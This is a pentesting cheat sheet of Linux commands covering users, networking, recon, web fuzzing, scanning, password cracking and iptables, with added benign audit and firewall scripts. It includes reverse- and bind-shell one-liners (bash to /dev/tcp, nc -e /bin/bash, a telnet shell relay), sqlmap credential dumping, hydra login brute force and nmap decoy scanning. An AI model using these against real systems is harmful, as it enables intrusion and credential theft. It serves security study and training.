┌──────────────────┐
│ Pentesting tools │
└──────────────────┘

┌───────┐
│ Users │
└───────┘

├ adduser user : adds a user; asks for the password, address, etc.
│ and sets the home directory and shell automatically
├ deluser user : deletes the specified user

├ useradd user : adds a user, but you have to specify everything yourself
│ -d dir : home directory of the new user
│ -s shell : login shell of the new user
│useradd -d /opt/admin -s /bin/bash user

├ su user : log in as user
├ adduser user sudo / deluser user sudo : adds/removes user from the sudo group
┌─────────┐
│ Network │
└─────────┘

├ ifconfig : shows interface information such as ip, netmask, broadcast...
│ interface ip netmask mask : changes the ip of an interface
│ifconfig eth0 10.0.0.1 netmask 255.255.255.0

├ /etc/network/interfaces : network configuration file, edit it to configure interfaces
│get an automatic ip:
│auto interface
│iface interface inet dhcp
│get a static ip:
│auto interface
│iface interface inet static
│address ip
│netmask mask
│broadcast ip

├ macchanger : changes the MAC address
│ -r interface : sets a random MAC on interface
│ -m MAC interface : sets MAC on interface
│ -p interface : resets interface to its original MAC
├ service networking restart : restarts the network service
├ /etc/init.d/networking restart : restarts the network through the init script

├ route : shows the routing table
│ -n : numeric output, shows the gateway ip instead of a name
│ add/del route : adds/deletes a route

├ netstat : shows sockets and ports
│ -l : listening ports only
│ -t : tcp ports
│ -u : udp ports
│ -n : shows port numbers instead of service names
│ -p : shows the PID/program that owns the port
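An added example (not part of the original cheat sheet) that audits the output of the netstat flags above: it keeps only listening sockets bound to every interface (0.0.0.0 or ::), the ones reachable from the network, and prints protocol, port and owning program. The netstat output below is constructed so the script runs offline; pipe real `netstat -lntup` output into `list_exposed` instead.

```shell
#!/bin/sh
# Added example: find listening sockets exposed on all interfaces.
# Usage on a real host:  netstat -lntup | list_exposed
list_exposed() {
    # With -n, column 4 of netstat is "local address:port". Keep rows whose
    # address is a wildcard and print "proto port program" once per socket.
    awk '$1 ~ /^(tcp|udp)/ && ($4 ~ /^0\.0\.0\.0:/ || $4 ~ /^:::/) {
            n = split($4, a, ":"); port = a[n];
            prog = ($NF == "-") ? "unknown" : $NF;
            print $1, port, prog
        }' | sort -u
}

# Constructed sample of `netstat -lntup` output (not captured from a real box).
SAMPLE_NETSTAT='Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      812/mysqld
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      455/sshd
tcp6       0      0 :::80                   :::*                    LISTEN      901/apache2
udp        0      0 0.0.0.0:68              0.0.0.0:*                           390/dhclient
udp        0      0 127.0.0.1:323           0.0.0.0:*                           -'

# Number of exposed sockets in the sample (mysqld and chrony on localhost are not).
exposed_count() {
    printf '%s\n' "$SAMPLE_NETSTAT" | list_exposed | wc -l | tr -d ' '
}

printf '%s\n' "$SAMPLE_NETSTAT" | list_exposed
```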
┌──────────┐
│ Services │
└──────────┘

├ service name start/stop/restart : starts, stops or restarts a service
│service ssh start
├ update-rc.d name enable/disable : enables/disables starting the service on boot
┌──────────┐
│ Archives │
└──────────┘

├ locate name : searches for a file in the system
│ if the file was created after the last index update, refresh the db first
│updatedb; locate access.log
├ whereis name : searches for a file in the system
├ find directory -name name : searches for name under directory
├ which binary : finds a binary in the PATH

├ tail/head file : returns the last/first 10 lines of a file
│ -f : follows the file in real time
│ -n int : displays int lines instead of 10

├ grep pattern file : searches for pattern
│cat /etc/passwd | grep '/bin/bash'
│grep '/bin/bash' /etc/passwd
│ > : redirects the output to a file
│grep '/bin/bash' /etc/passwd > temBash.txt
│ -v : shows the lines that don't match
│grep -v '/bin/bash' /etc/passwd
│ egrep : grep with extended regexes, to search several patterns at once
│egrep 'nologin|false' /etc/passwd

├ cut -d delimiter -fnum file : splits each line of the file by delimiter
│ and returns column num
│cut -d : -f1 /etc/passwd
│ -fcol1,col2 : returns more than one column
│cut -d : -f1,7 /etc/passwd

├ sed 's/toBeReplaced/toReplace/' file : replaces toBeReplaced with toReplace
│ > : redirects the output to a file; it must be a different file, because
│ redirecting onto the input file truncates it before sed reads it (use -i to edit in place)
│sed 's/bash/fish/' /etc/passwd > passwd.new

├ uniq : use it after cut or grep on sorted output, collapses adjacent repeated lines
│ -c : prefixes each line with its count
│cat /etc/passwd | grep '/bin/bash' | uniq -c

├ sort : sorts lines
│ -n : numeric sort
│ -u : drops repeated lines
│ -r : reverses the order
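An added example (not from the original cheat sheet) that puts the grep / cut / sort / uniq / sed entries above together as a small account audit. It works on a constructed copy of /etc/passwd in a temp file, so nothing on the real system is read or changed, and it shows the sort-before-uniq and sed-to-a-new-file points.

```shell
#!/bin/sh
# Added example: audit a constructed /etc/passwd with the cheat sheet's tools.
PASSWD=$(mktemp)
trap 'rm -f "$PASSWD"' EXIT
cat > "$PASSWD" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/bash
bob:x:1001:1001:Bob:/home/bob:/bin/bash
backup:x:34:34:backup:/var/backups:/bin/false
EOF

# Accounts that can log in interactively: drop nologin/false shells,
# then keep field 1 (name) and field 7 (shell).
interactive_users() {
    grep -Ev 'nologin|false' "$PASSWD" | cut -d : -f1,7
}

# How many accounts use each shell. uniq only merges adjacent duplicates,
# so the shell column is sorted first; the final sort orders by count.
shell_histogram() {
    cut -d : -f7 "$PASSWD" | sort | uniq -c | sort -rn
}

# Replace bash with fish. Redirecting sed's output back onto its own input
# would truncate the file before sed reads it, so write to a new file
# (sed -i is the in-place alternative). Prints the number of changed lines.
swap_shell() {
    OUT=$(mktemp)
    sed 's#/bin/bash#/usr/bin/fish#' "$PASSWD" > "$OUT"
    grep -c '/usr/bin/fish' "$OUT"
    rm -f "$OUT"
}

interactive_users
shell_histogram
```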
┌─────────┐
│ Traffic │
└─────────┘

├ ping ip : sends ICMP packets to ip
│ -c int : sends int packets
│ -t int : Time To Live (TTL)

├ fping ip : sends ICMP packets to ip
│ -c int : sends int packets
│ -g range : range of ips to scan
│ -a : shows only the hosts that are up
│fping -g 192.168.0.1/24 -a

├ tcpdump : traffic analyzer
│ -i interface : specifies the interface
│ -v : verbose
│ -w file : writes the capture to file
│ -r file : reads a capture from file
│ tcp/icmp/... : filters by protocol
│tcpdump -vi eth0 icmp -w icmp.pcap
│ -n : shows ips, doesn't resolve names
│ -e : shows the ethernet (link-layer) header
│ -A : prints packets in ascii
│ -X : prints packets in hexadecimal
│filters you can use: host ip / src host ip / dst host ip / port port

├ host name : shows the ip of name
│ -t type : record type, SOA, A, AAAA, NS, MX or PTR
│ -l : lists the hosts in a domain, uses an AXFR zone transfer
│   (zone transfers exist so that another dns server can serve the zone when the original stops working)
│ -v : verbose

├ nc host port : connects to host on port
│see the default service ports in /etc/services
│everything you do can be logged by the remote host, including your ip
│ -v : verbose
│ -l : listen
│ -p port : local port
│ -n : numeric, doesn't resolve names, only accepts ips
│ -u : udp instead of the default tcp
│ nc host port < file : sends file on connection
│ -z host port : scans to see if the port is open
│ -e file/bin : executes file/bin on connection
│nc -vnlp 5050 -e /bin/bash

├ ncat : exactly like nc, but supports tls encryption
│generate a self-signed certificate:
│openssl req -x509 -newkey rsa:2048 -keyout chave.pem -out cert.pem -days 10
│ncat -vnlp 443 --ssl-key chave.pem --ssl-cert cert.pem

├ telnet host port : connects to host:port like netcat, but a bit worse
│telnet ip1 port1 | /bin/bash | telnet ip2 port2
│connects to ip1 port1, feeds what it receives to a shell and sends the output to ip2 port2
│OBS: can be the same ip

├ /dev/tcp : bash opens tcp connections through this pseudo path
│echo 'this will be sent to the port' > /dev/tcp/192.168.0.200/4545
│bash -i > /dev/tcp/192.168.0.200/4545 0>&1 2>&1
│sends a bash shell to 192.168.0.200:4545, with input (0) and errors (2) going through the output (1)
┌─────────────────┐
│ Info. gathering │
└─────────────────┘

├ urlcrazy url : lists similar available urls (typo variants of url)

├ theHarvester : cli dorking
│ -d domain : specifies the domain
│ -l int : search limit
│ -b source : search engine to use, run theHarvester --help to see all
│ -f file.html : writes the output to file.html
├ exiftool doc : shows the metadata of doc

├ lynx url : cli browser
│ -dump : only outputs the page text, no interaction, useful in scripts

├ whois domain : iana whois, via cli
│ -h server : specifies a whois server, ex: whois.iana.org
├ bgpview.io / bgp.net : websites with info like asn/netblock for a domain

├ wafw00f url : web app firewall fingerprinter (checks for a firewall)
│ -v : verbose
│ -r : doesn't follow redirects (3xx)
│wafw00f -v testphp.vulnweb.com

├ whatweb url : discovers the web technologies being used
│ -v : verbose
│ -a int : aggression level, 1, 3 or 4
│whatweb -a 3 http://testphp.vulnweb.com

├ ffuf : web fuzzer
│ -u url : specifies the url, with FUZZ marking where to brute force
│ -w wordlist : wordlist to use
│ -e ext : extensions to append (.php, .html)
│ -recursion : enables recursion

├ wfuzz : web fuzzer
│ -c : colored output
│ -z type,param : payload to use in the FUZZ position
│wfuzz -c -z file,wordlist.txt http://testphp.vulnweb.com?FUZZ=admin.php
│ --hl/--hw/--hh int : hides responses with int lines/words/chars
│ --sl/--sw/--sh int : only shows responses with int lines/words/chars

├ dirb url wordlist : web directory fuzzer
│ -t : doesn't force a '/' at the end of urls
│ -a user_agent : sets the user-agent
│ -S : silent mode
│ -X ext : extensions to append (.php, .html)
│ -u user:pass : credentials, if HTTP authentication is needed
│dirb http://testphp.vulnweb.com/login -u admin:admin
│ -r : disables recursion
│ -R : interactive recursion, prompts before recursing
│ -o file : writes the output to file
│dirb http://testphp.vulnweb.com /usr/share/dirb/wordlists/common.txt -a "Chrome"

├ dnsenum : multi purpose dns tool
│ --enum domain : domain to enumerate
│ -f wordlist : wordlist for subdomain brute force
│ -w : performs whois
│ -r : enables recursion
├ nmap ip/range : scans the whole network in range
│nmap 192.168.0.0/24
│ -v : verbose
│ -T level : timing template, higher is more aggressive
│ -n : numeric, doesn't resolve names
│ -O : identifies the OS
│ -F : fast scan, the 100 most common ports
│ -sn : ping scan, no port scan
│ -sV : service version
│ -sF : sends only the FIN flag
│ -sT : full TCP connect scan
│ -sS : stealthier SYN scan
│ -sU : UDP scan
│ -p port : specifies ports, '-' scans all
│ -g src_port : uses src_port as the source port
│ -D ip : sets ip as a decoy; the decoy appears to send
│   the same traffic as you, making identification harder
│ --script script : specifies the script to use
│nmap --script vuln 192.168.0.110
│ -sC : runs the default scripts with the scan, a less noisy alternative to -A
│ --open : shows only open ports
│nmap -D RND:20 --open -sS -p- 192.168.0.1 -oN portsH
│ --exclude ip : excludes ip from the scan
│ -iL list : file with the hosts to scan
│ -iR int : picks int random hosts as targets
│ -Pn : doesn't ping before scanning, treats every host as up,
│   bypasses firewalls that drop ping
│ -PU port : pings with UDP packets on port instead of ICMP (omit the port
│   to use the default), bypasses firewalls that drop ICMP
│ -oN file : writes the output to file
│ -oX file : writes the output to file in xml format
├ sqlmap : sql injection testing and data extraction
│ -v : verbose
│ -u url : specifies the url
│ --current-db : grabs the db currently in use
│ --threads int : number of threads to use
│sqlmap -u "store.com/prod.php?prod=844" --current-db
│OBS: the url needs to have an injectable parameter (entry point)
│ --dbs : lists all dbs
│ -D db_name : db to get info from
│ --tables : lists the tables of the specified db
│sqlmap -u "store.com/prod.php?prod=844" -D store --tables
│ -T table : table to get info from
│ --columns : lists the columns of the specified table
│sqlmap -u "store.com/prod.php?prod=844" -D store -T users --columns
│ -C column : columns to get info from
│ --dump : dumps the contents of the specified table/columns
│sqlmap -u "store.com/prod.php?prod=844" -D store -T users -C 'name,email,password' --dump
┌──────────┐
│ Cracking │
└──────────┘

├ hash-identifier : identifies hash types
│hash-identifier

├ crunch : custom wordlist generator
│crunch <min chars> <max chars>
│crunch 9 9 -f charset.lst numeric -t admin@@@@
│/etc/crunch/charset.lst contains the character sets
│the @ marks where the characters go

├ hydra : password cracker
│ -l user : user to try
│ -L wordlist : wordlist of users to try
│ -p password : password to try
│ -P wordlist : wordlist of passwords to brute force with
│ -s port : specifies the port
│ -m param : modules like http-get, http-get-form etc. need params
│hydra -l admin -P passlist.txt http-head://testphp.vulnweb.com -m /basic.php
│hydra -l admin -P passlist.txt http-get-form://testphp.vulnweb.com
│   -m "/login.php:user=^USER^&password=^PASS^:Couldn't login"
│OBS: to filter by the successful login message instead: S=Welcome
│hydra -l admin -P passlist.txt http-post-form://testphp.vulnweb.com
│   -m "/login.php:user=^USER^&password=^PASS^:Couldn't login"

├ hashcat : hashed password cracker
│ -a int : attack mode [0-straight, 1-combination, 3-brute force,
│   6-hybrid wordlist + mask, 7-hybrid mask + wordlist]
│ -m type : hash type, see the hashcat man page for all
│ -o filename : file to write the cracked output to
│hashcat -a 0 -m 1000 -o cracked.txt "HASHEDPASSHERE" wordlist.txt
│hashcat -a 0 -m 1800 -o cracked.txt hashes.txt wordlist.txt
┌─────────┐
│ Defense │
└─────────┘

├ iptables : linux firewall
│ -L : lists the rules of a table, default is filter
│iptables -L
│iptables -L -t nat
│ -t table : table to use [filter, nat or mangle]
│ -d ipv4 : destination host
│ -s ipv4 : source host
│ -p protocol : protocol the rule applies to [tcp, udp or icmp]
│ --sport src_port : source port
│ --dport dst_port : destination port
│ -i interface : interface the packet came in on
│ -o interface : interface the packet goes out of
│ ! : negates the following match, like not in programming languages
│ -j action : action taken when the rule matches
│ACCEPT: accepts the packet
│DROP: discards the packet silently, no error is sent back
│REJECT: discards the packet and sends an error back
│DNAT: redirects the packet to the ip given via --to
│REDIRECT: redirects the packet to the port given via --to
│MASQUERADE: rewrites the source ipv4 to the address of the outgoing interface
│ -A chain rule : appends a rule to chain
│iptables -A OUTPUT -d 192.168.0.103 -j DROP
│iptables -A INPUT -p icmp -s 192.168.0.100 -j REJECT
│ -D chain rule : deletes a rule
│ -F : deletes all rules
│ -P chain policy : sets the default behavior of a chain [ACCEPT or DROP]
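An added example (not from the original cheat sheet) of a default-deny INPUT rule set built from the flags above: policy DROP, REJECT for SSH from outside an admin network, `!` negation, and a LOG rule so dropped packets show up in the kernel log. `-m conntrack --ctstate` is a standard iptables match not listed on the page; the admin network is a constructed value. Applying rules needs root, so the script only echoes the commands unless DRY_RUN=0 is exported.

```shell
#!/bin/sh
# Added example: default-deny INPUT chain. DRY_RUN=0 applies, anything else prints.
DRY_RUN="${DRY_RUN:-1}"
ADMIN_NET="192.168.0.0/24"   # constructed value: network allowed to reach SSH

# The rule set, one iptables command per line, so it can be reviewed or diffed
# before anything is applied.
build_rules() {
    cat <<EOF
iptables -F INPUT
iptables -P INPUT DROP
iptables -A INPUT -i lo -j ACCEPT
iptables -A INPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT
iptables -A INPUT -p tcp --dport 22 -s $ADMIN_NET -j ACCEPT
iptables -A INPUT -p tcp --dport 22 ! -s $ADMIN_NET -j REJECT
iptables -A INPUT -p tcp --dport 80 -j ACCEPT
iptables -A INPUT -p icmp -j ACCEPT
iptables -A INPUT -j LOG --log-prefix INPUT-DROP:
EOF
}
# Notes on the choices above:
#  -P INPUT DROP   packets no rule accepts are silently dropped (chain policy)
#  -F INPUT        flush first so re-running the script doesn't duplicate rules
#  --ctstate       lets replies to our own outbound connections back in
#  REJECT on 22    admins get an immediate error from the wrong network instead
#                  of a timeout; everything else falls through to the policy
#  -j LOG          non-terminating: logs the packet, then the policy drops it

# Echo (dry run) or execute each rule in order.
apply_rules() {
    build_rules | while IFS= read -r cmd; do
        if [ "$DRY_RUN" = "0" ]; then
            eval "$cmd"        # needs root
        else
            echo "[dry-run] $cmd"
        fi
    done
}

rule_count() { build_rules | wc -l | tr -d ' '; }

apply_rules
```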
┌──────────┐
│ Scanners │
└──────────┘

├ nikto : web server scanner
│nikto -host http://testphp.vulnweb.com
│ -o file : writes the output to file
├ wpscan : wordpress vuln scanner
│ --url url : url to scan
│ --enumerate p/t/u/tt : enumerates plugins/themes/users/timthumbs
├ skipfish : web app scanner
│skipfish -o path/to/output/folder/ http://testphp.vulnweb.com
├ wapiti : web app scanner
│wapiti http://testphp.vulnweb.com -o path/to/output/folder/
Creator: gabi schstr